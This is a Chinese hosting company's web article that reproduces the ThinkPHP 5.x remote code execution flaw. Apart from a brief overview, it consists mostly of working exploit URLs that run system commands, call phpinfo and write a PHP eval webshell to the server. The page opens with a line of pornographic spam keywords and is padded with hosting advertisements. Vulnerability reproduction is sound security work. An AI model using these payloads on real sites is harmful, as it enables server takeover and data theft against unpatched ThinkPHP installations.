真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

thinkphp遠(yuǎn)程執(zhí)行命令漏洞-創(chuàng)新互聯(lián)

這篇文章將為大家詳細(xì)講解有關(guān)thinkphp遠(yuǎn)程執(zhí)行命令漏洞,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。

成都服務(wù)器托管,創(chuàng)新互聯(lián)提供包括服務(wù)器租用、成都多線服務(wù)器托管、帶寬租用、云主機(jī)、機(jī)柜租用、主機(jī)租用托管、CDN網(wǎng)站加速、域名與空間等業(yè)務(wù)的一體化完整服務(wù)。電話咨詢:18980820575

漏洞概況

ThinkPHP是一款國內(nèi)流行的開源PHP框架,近日被爆出存在可能的遠(yuǎn)程代碼執(zhí)行漏洞,攻擊者可向緩存文件內(nèi)寫入PHP代碼,導(dǎo)致遠(yuǎn)程代碼執(zhí)行。

雖然該漏洞利用需要有幾個前提條件,但鑒于國內(nèi)使用ThinkPHP框架的站點數(shù)量之多,該漏洞還是存在一定的影響范圍。由于框架對控制器名沒有進(jìn)行足夠的檢測會導(dǎo)致在沒有開啟強(qiáng)制路由的情況下可能的getshell漏洞。

漏洞危害

攻擊者可通過該漏洞獲取網(wǎng)站的控制權(quán)限,可修改頁面,導(dǎo)致數(shù)據(jù)泄漏等問題。

影響版本

5.x < 5.1.31, <= 5.0.23

復(fù)現(xiàn)環(huán)境

thinkphp5.1   phpstudy集成環(huán)境(php5.6n+apache+mysql)

復(fù)現(xiàn)過程

1、如圖所示首先搭建好環(huán)境

thinkphp遠(yuǎn)程執(zhí)行命令漏洞

2、利用system函數(shù)遠(yuǎn)程命令執(zhí)行:

http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=whoami

thinkphp遠(yuǎn)程執(zhí)行命令漏洞

3、通過phpinfo函數(shù)寫出phpinfo()的信息:

http://localhost/thinkphp5.1/html/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

thinkphp遠(yuǎn)程執(zhí)行命令漏洞

4、寫入shell:

http://localhost/thinkphp5.1/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

thinkphp遠(yuǎn)程執(zhí)行命令漏洞

http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=

關(guān)于“thinkphp遠(yuǎn)程執(zhí)行命令漏洞”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,使各位可以學(xué)到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。


本文名稱:thinkphp遠(yuǎn)程執(zhí)行命令漏洞-創(chuàng)新互聯(lián)
當(dāng)前路徑:http://weahome.cn/article/gidhc.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部